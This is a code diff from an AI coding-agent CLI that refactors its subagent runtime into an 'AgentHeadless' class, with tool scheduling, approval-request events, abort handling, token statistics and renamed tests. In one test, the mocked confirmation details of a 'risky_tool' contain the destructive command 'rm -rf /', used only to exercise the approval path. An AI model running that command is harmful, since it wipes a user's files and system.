duration, + errorMessage, + timestamp: Date.now(), + }); + + // Append response parts + const respParts = call.response.responseParts; + if (respParts) { + const parts = Array.isArray(respParts) ? 
respParts : [respParts]; + for (const part of parts) { + if (typeof part === 'string') { + toolResponseParts.push({ text: part }); + } else if (part) { + toolResponseParts.push(part); + } + } + } + } + // Signal that this batch is complete (all tools terminal) + resolveBatch?.(); + }, + onToolCallsUpdate: (calls: ToolCall[]) => { + for (const call of calls) { + // Track PTY PIDs so TOOL_OUTPUT_UPDATE events can carry them. + if (call.status === 'executing') { + const pid = (call as ExecutingToolCall).pid; + if (pid !== undefined) { + const isNewPid = !pidMap.has(call.request.callId); + pidMap.set(call.request.callId, pid); + // Emit immediately so the UI can offer interactive shell + // focus (Ctrl+F) before the tool produces its first output. + if (isNewPid) { + this.eventEmitter?.emit(AgentEventType.TOOL_OUTPUT_UPDATE, { + subagentId: this.subagentId, + round: currentRound, + callId: call.request.callId, + outputChunk: (call as ExecutingToolCall).liveOutput ?? '', + pid, + timestamp: Date.now(), + } as AgentToolOutputUpdateEvent); + } + } + } + + if (call.status !== 'awaiting_approval') continue; + const waiting = call as WaitingToolCall; + + // Emit approval request event for UI visibility + try { + const { confirmationDetails } = waiting; + const { onConfirm: _onConfirm, ...rest } = confirmationDetails; + this.eventEmitter?.emit(AgentEventType.TOOL_WAITING_APPROVAL, { + subagentId: this.subagentId, + round: currentRound, + callId: waiting.request.callId, + name: waiting.request.name, + description: this.getToolDescription( + waiting.request.name, + waiting.request.args, + ), + confirmationDetails: rest, + respond: async ( + outcome: ToolConfirmationOutcome, + payload?: Parameters< + ToolCallConfirmationDetails['onConfirm'] + >[1], + ) => { + if (responded.has(waiting.request.callId)) return; + responded.add(waiting.request.callId); + await waiting.confirmationDetails.onConfirm(outcome, payload); + }, + timestamp: Date.now(), + }); + } catch { + // ignore UI 
event emission failures + } + } + }, + getPreferredEditor: () => undefined, + onEditorClose: () => {}, + }); + + // Prepare requests and emit TOOL_CALL events + const requests: ToolCallRequestInfo[] = authorizedCalls.map((fc) => { + const toolName = String(fc.name || 'unknown'); + const callId = fc.id ?? `${fc.name}-${Date.now()}`; + const args = (fc.args ?? {}) as Record; + const request: ToolCallRequestInfo = { + callId, + name: toolName, + args, + isClientInitiated: true, + prompt_id: promptId, + response_id: responseId, + }; + + const description = this.getToolDescription(toolName, args); + const isOutputMarkdown = this.getToolIsOutputMarkdown(toolName); + this.eventEmitter?.emit(AgentEventType.TOOL_CALL, { + subagentId: this.subagentId, + round: currentRound, + callId, + name: toolName, + args, + description, + isOutputMarkdown, + timestamp: Date.now(), + } as AgentToolCallEvent); + + // pre-tool hook + void this.hooks?.preToolUse?.({ + subagentId: this.subagentId, + name: this.name, + toolName, + args, + timestamp: Date.now(), + }); + + return request; + }); + + if (requests.length > 0) { + // Create a per-batch completion promise + const batchDone = new Promise((resolve) => { + resolveBatch = () => { + resolve(); + resolveBatch = null; + }; + }); + + // Auto-resolve on abort so processFunctionCalls doesn't block forever + // when tools are awaiting approval or executing without abort support. 
+      const onAbort = () => {
+        resolveBatch?.();
+        for (const req of requests) {
+          if (emittedCallIds.has(req.callId)) continue;
+          emittedCallIds.add(req.callId);
+
+          const errorMessage = 'Tool call cancelled by user abort.';
+          this.recordToolCallStats(req.name, false, 0, errorMessage);
+
+          this.eventEmitter?.emit(AgentEventType.TOOL_RESULT, {
+            subagentId: this.subagentId,
+            round: currentRound,
+            callId: req.callId,
+            name: req.name,
+            success: false,
+            error: errorMessage,
+            responseParts: [
+              {
+                functionResponse: {
+                  id: req.callId,
+                  name: req.name,
+                  response: { error: errorMessage },
+                },
+              },
+            ],
+            resultDisplay: errorMessage,
+            durationMs: 0,
+            timestamp: Date.now(),
+          } as AgentToolResultEvent);
+        }
+      };
+      abortController.signal.addEventListener('abort', onAbort, { once: true });
+
+      // If already aborted before the listener was registered, resolve
+      // immediately to avoid blocking forever.
+      if (abortController.signal.aborted) {
+        onAbort();
+      }
+
+      await scheduler.schedule(requests, abortController.signal);
+      await batchDone;
+
+      abortController.signal.removeEventListener('abort', onAbort);
+    }
+
+    // If all tool calls failed, inform the model so it can re-evaluate.
+    if (functionCalls.length > 0 && toolResponseParts.length === 0) {
+      toolResponseParts.push({
+        text: 'All tool calls failed. Please analyze the errors and try an alternative approach.',
+      });
+    }
+
+    return [{ role: 'user', parts: toolResponseParts }];
+  }
+
+  // ─── Stats & Events ───────────────────────────────────────
+
+  getEventEmitter(): AgentEventEmitter | undefined {
+    return this.eventEmitter;
+  }
+
+  getExecutionSummary(): AgentStatsSummary {
+    return this.stats.getSummary();
+  }
+
+  /**
+   * Returns legacy execution statistics and per-tool usage.
+   * `successRate` is a percentage (0-100); it is 0 when no tool calls were recorded.
+   */
+  getStatistics(): {
+    successRate: number;
+    toolUsage: Array<{
+      name: string;
+      count: number;
+      success: number;
+      failure: number;
+      lastError?: string;
+      totalDurationMs?: number;
+      averageDurationMs?: number;
+    }>;
+  } & ExecutionStats {
+    const total = this.executionStats.totalToolCalls;
+    const successRate =
+      total > 0 ? (this.executionStats.successfulToolCalls / total) * 100 : 0;
+    return {
+      ...this.executionStats,
+      successRate,
+      toolUsage: Array.from(this.toolUsage.entries()).map(([name, v]) => ({
+        name,
+        ...v,
+      })),
+    };
+  }
+
+  /**
+   * Safely retrieves the description of a tool by attempting to build it.
+   * Returns an empty string if the tool is not registered or any error occurs.
+   */
+  getToolDescription(toolName: string, args: Record<string, unknown>): string {
+    try {
+      const toolRegistry = this.runtimeContext.getToolRegistry();
+      const tool = toolRegistry.getTool(toolName);
+      if (!tool) {
+        return '';
+      }
+
+      const toolInstance = tool.build(args);
+      return toolInstance.getDescription() || '';
+    } catch {
+      return '';
+    }
+  }
+
+  private getToolIsOutputMarkdown(toolName: string): boolean {
+    try {
+      const toolRegistry = this.runtimeContext.getToolRegistry();
+      return toolRegistry.getTool(toolName)?.isOutputMarkdown ?? false;
+    } catch {
+      return false;
+    }
+  }
+
+  /**
+   * Records tool call statistics for both successful and failed tool calls.
+   */
+  recordToolCallStats(
+    toolName: string,
+    success: boolean,
+    durationMs: number,
+    errorMessage?: string,
+  ): void {
+    // Update aggregate stats
+    this.executionStats.totalToolCalls += 1;
+    if (success) {
+      this.executionStats.successfulToolCalls += 1;
+    } else {
+      this.executionStats.failedToolCalls += 1;
+    }
+
+    // Per-tool usage
+    const tu = this.toolUsage.get(toolName) || {
+      count: 0,
+      success: 0,
+      failure: 0,
+      totalDurationMs: 0,
+      averageDurationMs: 0,
+    };
+    tu.count += 1;
+    if (success) {
+      tu.success += 1;
+    } else {
+      tu.failure += 1;
+      tu.lastError = errorMessage || 'Unknown error';
+    }
+    tu.totalDurationMs = (tu.totalDurationMs || 0) + durationMs;
+    tu.averageDurationMs = tu.count > 0 ? tu.totalDurationMs / tu.count : 0;
+    this.toolUsage.set(toolName, tu);
+
+    // Update statistics service
+    this.stats.recordToolCall(
+      toolName,
+      success,
+      durationMs,
+      this.toolUsage.get(toolName)?.lastError,
+    );
+  }
+
+  // ─── Private Helpers ──────────────────────────────────────
+
+  /**
+   * Builds the system prompt: template substitution, the non-interactive rules
+   * suffix (unless `options.interactive`), then any non-empty user memory.
+   */
+  private buildChatSystemPrompt(
+    context: ContextState,
+    options?: CreateChatOptions,
+  ): string {
+    if (!this.promptConfig.systemPrompt) {
+      return '';
+    }
+
+    let finalPrompt = templateString(this.promptConfig.systemPrompt, context);
+
+    // Only add non-interactive instructions when NOT in interactive mode
+    if (!options?.interactive) {
+      finalPrompt += `
+
+Important Rules:
+ - You operate in non-interactive mode: do not ask the user questions; proceed with available context.
+ - Use tools only when necessary to obtain facts or make changes.
+ - When the task is complete, return the final result as a normal model response (not a tool call) and stop.`;
+    }
+
+    // Append user memory (QWEN.md + output-language.md) to ensure subagent respects project conventions
+    const userMemory = this.runtimeContext.getUserMemory();
+    if (userMemory && userMemory.trim().length > 0) {
+      finalPrompt += `\n\n---\n\n${userMemory.trim()}`;
+    }
+
+    return finalPrompt;
+  }
+
+  /**
+   * Records token usage from response metadata and emits USAGE_METADATA.
+   */
+  private recordTokenUsage(
+    usage: GenerateContentResponseUsageMetadata,
+    turnCounter: number,
+    roundStreamStart: number,
+  ): void {
+    const inTok = Number(usage.promptTokenCount || 0);
+    const outTok = Number(usage.candidatesTokenCount || 0);
+    const thoughtTok = Number(usage.thoughtsTokenCount || 0);
+    const cachedTok = Number(usage.cachedContentTokenCount || 0);
+    const totalTok = Number(usage.totalTokenCount || 0);
+    // Prefer totalTokenCount (prompt + output) for context usage — the
+    // output from this round becomes history for the next, matching
+    // the approach in geminiChat.ts.
+    const contextTok = isFinite(totalTok) && totalTok > 0 ? totalTok : inTok;
+    if (isFinite(contextTok) && contextTok > 0) {
+      this.lastPromptTokenCount = contextTok;
+    }
+    if (
+      isFinite(inTok) ||
+      isFinite(outTok) ||
+      isFinite(thoughtTok) ||
+      isFinite(cachedTok)
+    ) {
+      this.stats.recordTokens(
+        isFinite(inTok) ? inTok : 0,
+        isFinite(outTok) ? outTok : 0,
+        isFinite(thoughtTok) ? thoughtTok : 0,
+        isFinite(cachedTok) ? cachedTok : 0,
+        isFinite(totalTok) ? totalTok : 0,
+      );
+      // Mirror legacy fields for compatibility
+      this.executionStats.inputTokens =
+        (this.executionStats.inputTokens || 0) + (isFinite(inTok) ? inTok : 0);
+      this.executionStats.outputTokens =
+        (this.executionStats.outputTokens || 0) +
+        (isFinite(outTok) ? outTok : 0);
+      this.executionStats.totalTokens =
+        (this.executionStats.totalTokens || 0) +
+        (isFinite(totalTok) ? totalTok : 0);
+    }
+    this.eventEmitter?.emit(AgentEventType.USAGE_METADATA, {
+      subagentId: this.subagentId,
+      round: turnCounter,
+      usage,
+      durationMs: Date.now() - roundStreamStart,
+      timestamp: Date.now(),
+    } as AgentUsageEvent);
+  }
+}
diff --git a/packages/core/src/agents/runtime/agent-events.ts b/packages/core/src/agents/runtime/agent-events.ts
new file mode 100644
index 000000000..4626bb0cd
--- /dev/null
+++ b/packages/core/src/agents/runtime/agent-events.ts
@@ -0,0 +1,260 @@
+/**
+ * @license
+ * Copyright 2025 Qwen
+ * SPDX-License-Identifier: Apache-2.0
+ */
+
+/**
+ * @fileoverview Agent event types, emitter, and lifecycle hooks.
+ *
+ * Defines the observation/notification contracts for the agent runtime:
+ * - Event types emitted during agent execution (streaming, tool calls, etc.)
+ * - AgentEventEmitter — typed wrapper around EventEmitter
+ * - Lifecycle hooks (pre/post tool use, stop); each may be sync or return a Promise
+ */
+
+import { EventEmitter } from 'events';
+import type {
+  ToolCallConfirmationDetails,
+  ToolConfirmationOutcome,
+  ToolResultDisplay,
+} from '../../tools/tools.js';
+import type { Part, GenerateContentResponseUsageMetadata } from '@google/genai';
+import type { AgentStatus } from './agent-types.js';
+
+// ─── Event Types ────────────────────────────────────────────
+
+export type AgentEvent =
+  | 'start'
+  | 'round_start'
+  | 'round_end'
+  | 'round_text'
+  | 'stream_text'
+  | 'tool_call'
+  | 'tool_result'
+  | 'tool_output_update'
+  | 'tool_waiting_approval'
+  | 'usage_metadata'
+  | 'finish'
+  | 'error'
+  | 'status_change';
+
+export enum AgentEventType {
+  START = 'start',
+  ROUND_START = 'round_start',
+  ROUND_END = 'round_end',
+  /** Complete round text, emitted once after streaming before tool calls. */
+  ROUND_TEXT = 'round_text',
+  STREAM_TEXT = 'stream_text',
+  TOOL_CALL = 'tool_call',
+  TOOL_RESULT = 'tool_result',
+  TOOL_OUTPUT_UPDATE = 'tool_output_update',
+  TOOL_WAITING_APPROVAL = 'tool_waiting_approval',
+  USAGE_METADATA = 'usage_metadata',
+  FINISH = 'finish',
+  ERROR = 'error',
+  STATUS_CHANGE = 'status_change',
+}
+
+// ─── Event Payloads ─────────────────────────────────────────
+
+export interface AgentStartEvent {
+  subagentId: string;
+  name: string;
+  model?: string;
+  tools: string[];
+  timestamp: number;
+}
+
+export interface AgentRoundEvent {
+  subagentId: string;
+  round: number;
+  promptId: string;
+  timestamp: number;
+}
+
+export interface AgentRoundTextEvent {
+  subagentId: string;
+  round: number;
+  text: string;
+  thoughtText: string;
+  timestamp: number;
+}
+
+export interface AgentStreamTextEvent {
+  subagentId: string;
+  round: number;
+  text: string;
+  /** Whether this text is reasoning/thinking content (as opposed to regular output) */
+  thought?: boolean;
+  timestamp: number;
+}
+
+export interface AgentUsageEvent {
+  subagentId: string;
+  round: number;
+  usage: GenerateContentResponseUsageMetadata;
+  durationMs?: number;
+  timestamp: number;
+}
+
+export interface AgentToolCallEvent {
+  subagentId: string;
+  round: number;
+  callId: string;
+  name: string;
+  args: Record<string, unknown>;
+  description: string;
+  /** Whether the tool's output should be rendered as markdown. */
+  isOutputMarkdown?: boolean;
+  timestamp: number;
+}
+
+export interface AgentToolResultEvent {
+  subagentId: string;
+  round: number;
+  callId: string;
+  name: string;
+  success: boolean;
+  error?: string;
+  responseParts?: Part[];
+  resultDisplay?: ToolResultDisplay;
+  /** Path to the temp file where oversized output was saved. */
+  outputFile?: string;
+  durationMs?: number;
+  timestamp: number;
+}
+
+export interface AgentToolOutputUpdateEvent {
+  subagentId: string;
+  round: number;
+  callId: string;
+  /** Latest accumulated output for this tool call (replaces previous). */
+  outputChunk: ToolResultDisplay;
+  /** PTY process PID — present when the tool runs in an interactive shell. */
+  pid?: number;
+  timestamp: number;
+}
+
+export interface AgentApprovalRequestEvent {
+  subagentId: string;
+  round: number;
+  callId: string;
+  name: string;
+  description: string;
+  confirmationDetails: Omit<ToolCallConfirmationDetails, 'onConfirm'> & {
+    type: ToolCallConfirmationDetails['type'];
+  };
+  respond: (
+    outcome: ToolConfirmationOutcome,
+    payload?: Parameters<ToolCallConfirmationDetails['onConfirm']>[1],
+  ) => Promise<void>;
+  timestamp: number;
+}
+
+export interface AgentFinishEvent {
+  subagentId: string;
+  terminateReason: string;
+  timestamp: number;
+  rounds?: number;
+  totalDurationMs?: number;
+  totalToolCalls?: number;
+  successfulToolCalls?: number;
+  failedToolCalls?: number;
+  inputTokens?: number;
+  outputTokens?: number;
+  totalTokens?: number;
+}
+
+export interface AgentErrorEvent {
+  subagentId: string;
+  error: string;
+  timestamp: number;
+}
+
+export interface AgentStatusChangeEvent {
+  agentId: string;
+  previousStatus: AgentStatus;
+  newStatus: AgentStatus;
+  /** True when the transition to IDLE was caused by user cancelling the round. */
+  roundCancelledByUser?: boolean;
+  timestamp: number;
+}
+
+// ─── Event Map ──────────────────────────────────────────────
+
+/**
+ * Maps each event type to its payload type for type-safe emit/on.
+ */
+export interface AgentEventMap {
+  [AgentEventType.START]: AgentStartEvent;
+  [AgentEventType.ROUND_START]: AgentRoundEvent;
+  [AgentEventType.ROUND_END]: AgentRoundEvent;
+  [AgentEventType.ROUND_TEXT]: AgentRoundTextEvent;
+  [AgentEventType.STREAM_TEXT]: AgentStreamTextEvent;
+  [AgentEventType.TOOL_CALL]: AgentToolCallEvent;
+  [AgentEventType.TOOL_RESULT]: AgentToolResultEvent;
+  [AgentEventType.TOOL_OUTPUT_UPDATE]: AgentToolOutputUpdateEvent;
+  [AgentEventType.TOOL_WAITING_APPROVAL]: AgentApprovalRequestEvent;
+  [AgentEventType.USAGE_METADATA]: AgentUsageEvent;
+  [AgentEventType.FINISH]: AgentFinishEvent;
+  [AgentEventType.ERROR]: AgentErrorEvent;
+  [AgentEventType.STATUS_CHANGE]: AgentStatusChangeEvent;
+}
+
+// ─── Event Emitter ──────────────────────────────────────────
+
+export class AgentEventEmitter {
+  private ee = new EventEmitter();
+
+  on<E extends keyof AgentEventMap>(
+    event: E,
+    listener: (payload: AgentEventMap[E]) => void,
+  ): void {
+    this.ee.on(event, listener as (...args: unknown[]) => void);
+  }
+
+  off<E extends keyof AgentEventMap>(
+    event: E,
+    listener: (payload: AgentEventMap[E]) => void,
+  ): void {
+    this.ee.off(event, listener as (...args: unknown[]) => void);
+  }
+  // Guarded emit: Node throws when 'error' is emitted with no listener attached.
+  emit<E extends keyof AgentEventMap>(
+    event: E,
+    payload: AgentEventMap[E],
+  ): void {
+    if (this.ee.listenerCount(event) > 0) this.ee.emit(event, payload);
+  }
+}
+
+// ─── Lifecycle Hooks ────────────────────────────────────────
+
+export interface PreToolUsePayload {
+  subagentId: string;
+  name: string; // subagent name
+  toolName: string;
+  args: Record<string, unknown>;
+  timestamp: number;
+}
+
+export interface PostToolUsePayload extends PreToolUsePayload {
+  success: boolean;
+  durationMs: number;
+  errorMessage?: string;
+}
+
+export interface AgentStopPayload {
+  subagentId: string;
+  name: string; // subagent name
+  terminateReason: string;
+  summary: Record<string, unknown>;
+  timestamp: number;
+}
+
+export interface AgentHooks {
+  preToolUse?(payload: PreToolUsePayload): Promise<void> | void;
+  postToolUse?(payload: PostToolUsePayload): Promise<void> | void;
+  onStop?(payload: AgentStopPayload): Promise<void> | void;
+}
diff --git a/packages/core/src/subagents/subagent.test.ts b/packages/core/src/agents/runtime/agent-headless.test.ts similarity index 85% rename from packages/core/src/subagents/subagent.test.ts rename to packages/core/src/agents/runtime/agent-headless.test.ts index 0286d11c8..01ff1b040 100644 --- a/packages/core/src/subagents/subagent.test.ts +++ b/packages/core/src/agents/runtime/agent-headless.test.ts @@ -21,39 +21,39 @@ import { vi, type Mock, } from 'vitest'; -import { Config, type ConfigParameters } from '../config/config.js'; -import { DEFAULT_QWEN_MODEL } from '../config/models.js'; +import { Config, type ConfigParameters } from '../../config/config.js'; +import { DEFAULT_QWEN_MODEL } from '../../config/models.js'; import { createContentGenerator, createContentGeneratorConfig, resolveContentGeneratorConfigWithSources, AuthType, -} from '../core/contentGenerator.js'; -import { GeminiChat } from '../core/geminiChat.js'; -import { executeToolCall } from '../core/nonInteractiveToolExecutor.js'; -import type { ToolRegistry } from '../tools/tool-registry.js'; -import { type AnyDeclarativeTool } from '../tools/tools.js'; -import { ContextState, SubAgentScope } from './subagent.js'; +} from '../../core/contentGenerator.js'; +import { GeminiChat } from '../../core/geminiChat.js'; +import { executeToolCall } from '../../core/nonInteractiveToolExecutor.js'; +import type { ToolRegistry } from '../../tools/tool-registry.js'; +import { type AnyDeclarativeTool } from '../../tools/tools.js'; +import { ContextState, AgentHeadless } from './agent-headless.js'; import { - SubAgentEventEmitter, - SubAgentEventType, - type SubAgentStreamTextEvent, - type SubAgentToolCallEvent, - type SubAgentToolResultEvent, -} from './subagent-events.js'; + AgentEventEmitter, + AgentEventType, + type AgentStreamTextEvent, + type AgentToolCallEvent, + type AgentToolResultEvent, +} from './agent-events.js'; import type { ModelConfig, PromptConfig, RunConfig, ToolConfig, -} from './types.js'; 
-import { SubagentTerminateMode } from './types.js'; +} from './agent-types.js'; +import { AgentTerminateMode } from './agent-types.js'; -vi.mock('../core/geminiChat.js'); -vi.mock('../core/contentGenerator.js', async (importOriginal) => { +vi.mock('../../core/geminiChat.js'); +vi.mock('../../core/contentGenerator.js', async (importOriginal) => { const actual = - await importOriginal(); - const { DEFAULT_QWEN_MODEL } = await import('../config/models.js'); + await importOriginal(); + const { DEFAULT_QWEN_MODEL } = await import('../../config/models.js'); return { ...actual, createContentGenerator: vi.fn().mockResolvedValue({ @@ -77,7 +77,7 @@ vi.mock('../core/contentGenerator.js', async (importOriginal) => { }), }; }); -vi.mock('../utils/environmentContext.js', () => ({ +vi.mock('../../utils/environmentContext.js', () => ({ getEnvironmentContext: vi.fn().mockResolvedValue([{ text: 'Env Context' }]), getInitialChatHistory: vi.fn(async (_config, extraHistory) => [ { @@ -91,11 +91,11 @@ vi.mock('../utils/environmentContext.js', () => ({ ...(extraHistory ?? 
[]), ]), })); -vi.mock('../core/nonInteractiveToolExecutor.js'); -vi.mock('../ide/ide-client.js'); -vi.mock('../core/client.js'); +vi.mock('../../core/nonInteractiveToolExecutor.js'); +vi.mock('../../ide/ide-client.js'); +vi.mock('../../core/client.js'); -vi.mock('../skills/skill-manager.js', () => { +vi.mock('../../skills/skill-manager.js', () => { const SkillManagerMock = vi.fn(); SkillManagerMock.prototype.startWatching = vi .fn() @@ -107,7 +107,7 @@ vi.mock('../skills/skill-manager.js', () => { return { SkillManager: SkillManagerMock }; }); -vi.mock('./subagent-manager.js', () => { +vi.mock('../../subagents/subagent-manager.js', () => { const SubagentManagerMock = vi.fn(); SubagentManagerMock.prototype.loadSessionSubagents = vi.fn(); SubagentManagerMock.prototype.addChangeListener = vi @@ -226,7 +226,7 @@ describe('subagent.ts', () => { }); }); - describe('SubAgentScope', () => { + describe('AgentHeadless', () => { let mockSendMessageStream: Mock; const defaultModelConfig: ModelConfig = { @@ -299,16 +299,16 @@ describe('subagent.ts', () => { describe('create (Tool Validation)', () => { const promptConfig: PromptConfig = { systemPrompt: 'Test prompt' }; - it('should create a SubAgentScope successfully with minimal config', async () => { + it('should create a AgentHeadless successfully with minimal config', async () => { const { config } = await createMockConfig(); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, defaultModelConfig, defaultRunConfig, ); - expect(scope).toBeInstanceOf(SubAgentScope); + expect(scope).toBeInstanceOf(AgentHeadless); }); it('should not block creation when a tool may require confirmation', async () => { @@ -316,7 +316,8 @@ describe('subagent.ts', () => { name: 'risky_tool', schema: { parametersJsonSchema: { type: 'object', properties: {} } }, build: vi.fn().mockReturnValue({ - shouldConfirmExecute: vi.fn().mockResolvedValue({ + getDefaultPermission: 
vi.fn().mockResolvedValue('ask'), + getConfirmationDetails: vi.fn().mockResolvedValue({ type: 'exec', title: 'Confirm', command: 'rm -rf /', @@ -331,7 +332,7 @@ describe('subagent.ts', () => { const toolConfig: ToolConfig = { tools: ['risky_tool'] }; - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -339,7 +340,7 @@ describe('subagent.ts', () => { defaultRunConfig, toolConfig, ); - expect(scope).toBeInstanceOf(SubAgentScope); + expect(scope).toBeInstanceOf(AgentHeadless); }); it('should succeed if tools do not require confirmation', async () => { @@ -347,7 +348,7 @@ describe('subagent.ts', () => { name: 'safe_tool', schema: { parametersJsonSchema: { type: 'object', properties: {} } }, build: vi.fn().mockReturnValue({ - shouldConfirmExecute: vi.fn().mockResolvedValue(null), + getDefaultPermission: vi.fn().mockResolvedValue('allow'), }), }; const { config } = await createMockConfig({ @@ -357,7 +358,7 @@ describe('subagent.ts', () => { const toolConfig: ToolConfig = { tools: ['safe_tool'] }; - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -365,7 +366,7 @@ describe('subagent.ts', () => { defaultRunConfig, toolConfig, ); - expect(scope).toBeInstanceOf(SubAgentScope); + expect(scope).toBeInstanceOf(AgentHeadless); }); it('should allow creation regardless of tool parameter requirements', async () => { @@ -390,7 +391,7 @@ describe('subagent.ts', () => { const toolConfig: ToolConfig = { tools: ['tool_with_params'] }; - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -399,13 +400,13 @@ describe('subagent.ts', () => { toolConfig, ); - expect(scope).toBeInstanceOf(SubAgentScope); + expect(scope).toBeInstanceOf(AgentHeadless); // Ensure build was not called during creation expect(mockToolWithParams.build).not.toHaveBeenCalled(); }); }); - 
describe('runNonInteractive - Initialization and Prompting', () => { + describe('execute - Initialization and Prompting', () => { it('should correctly template the system prompt and initialize GeminiChat', async () => { const { config } = await createMockConfig(); @@ -421,7 +422,7 @@ describe('subagent.ts', () => { // Model stops immediately mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -429,7 +430,7 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(context); + await scope.execute(context); // Check if GeminiChat was initialized correctly by the subagent expect(GeminiChat).toHaveBeenCalledTimes(1); @@ -473,7 +474,7 @@ describe('subagent.ts', () => { mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -481,7 +482,7 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(context); + await scope.execute(context); const generationConfig = getGenerationConfigFromMock(); expect(generationConfig.systemInstruction).toContain( @@ -511,7 +512,7 @@ describe('subagent.ts', () => { mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -519,7 +520,7 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(context); + await scope.execute(context); const generationConfig = getGenerationConfigFromMock(); const sysPrompt = generationConfig.systemInstruction as string; @@ -540,7 +541,7 @@ describe('subagent.ts', () => { mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await 
AgentHeadless.create( 'test-agent', config, promptConfig, @@ -548,7 +549,7 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(context); + await scope.execute(context); const generationConfig = getGenerationConfigFromMock(); const sysPrompt = generationConfig.systemInstruction as string; @@ -568,7 +569,7 @@ describe('subagent.ts', () => { // Model stops immediately mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -576,7 +577,7 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(context); + await scope.execute(context); const callArgs = vi.mocked(GeminiChat).mock.calls[0]; const generationConfig = getGenerationConfigFromMock(); @@ -602,7 +603,7 @@ describe('subagent.ts', () => { context.set('name', 'Agent'); // 'missing' is not set - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -610,11 +611,11 @@ describe('subagent.ts', () => { defaultRunConfig, ); - // The error from templating causes the runNonInteractive to reject and the terminate_reason to be ERROR. - await expect(scope.runNonInteractive(context)).rejects.toThrow( + // The error from templating causes the execute to reject and the terminate_reason to be ERROR. 
+ await expect(scope.execute(context)).rejects.toThrow( 'Missing context values for the following keys: missing', ); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.ERROR); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.ERROR); }); it('should validate that systemPrompt and initialMessages are mutually exclusive', async () => { @@ -625,7 +626,7 @@ describe('subagent.ts', () => { }; const context = new ContextState(); - const agent = await SubAgentScope.create( + const agent = await AgentHeadless.create( 'TestAgent', config, promptConfig, @@ -633,14 +634,14 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await expect(agent.runNonInteractive(context)).rejects.toThrow( + await expect(agent.execute(context)).rejects.toThrow( 'PromptConfig cannot have both `systemPrompt` and `initialMessages` defined.', ); - expect(agent.getTerminateMode()).toBe(SubagentTerminateMode.ERROR); + expect(agent.getTerminateMode()).toBe(AgentTerminateMode.ERROR); }); }); - describe('runNonInteractive - Execution and Tool Use', () => { + describe('execute - Execution and Tool Use', () => { const promptConfig: PromptConfig = { systemPrompt: 'Execute task.' 
}; it('should terminate with GOAL if no outputs are expected and model stops', async () => { @@ -648,7 +649,7 @@ describe('subagent.ts', () => { // Model stops immediately mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -657,9 +658,9 @@ describe('subagent.ts', () => { // No ToolConfig, No OutputConfig ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.GOAL); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.GOAL); expect(mockSendMessageStream).toHaveBeenCalledTimes(1); // Check the initial message expect(mockSendMessageStream.mock.calls[0][1].message).toEqual([ @@ -673,7 +674,7 @@ describe('subagent.ts', () => { // Model stops immediately with text response mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -681,9 +682,9 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.GOAL); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.GOAL); expect(mockSendMessageStream).toHaveBeenCalledTimes(1); }); @@ -722,7 +723,7 @@ describe('subagent.ts', () => { params: { path: '.' }, getDescription: vi.fn().mockReturnValue('List files'), toolLocations: vi.fn().mockReturnValue([]), - shouldConfirmExecute: vi.fn().mockResolvedValue(false), + getDefaultPermission: vi.fn().mockResolvedValue('allow'), execute: vi.fn().mockResolvedValue({ llmContent: 'file1.txt\nfile2.ts', returnDisplay: 'Listed 2 files', @@ -744,7 +745,7 @@ describe('subagent.ts', () => { name === 'list_files' ? 
listFilesTool : undefined, ); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -753,7 +754,7 @@ describe('subagent.ts', () => { toolConfig, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); // Check the response sent back to the model (functionResponse part) const secondCallArgs = mockSendMessageStream.mock.calls[1][1]; @@ -764,11 +765,11 @@ describe('subagent.ts', () => { 'file1.txt\nfile2.ts', ); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.GOAL); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.GOAL); }); }); - describe('runNonInteractive - Termination and Recovery', () => { + describe('execute - Termination and Recovery', () => { const promptConfig: PromptConfig = { systemPrompt: 'Execute task.' }; it('should terminate with MAX_TURNS if the limit is reached', async () => { @@ -800,7 +801,7 @@ describe('subagent.ts', () => { ]), ); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -808,10 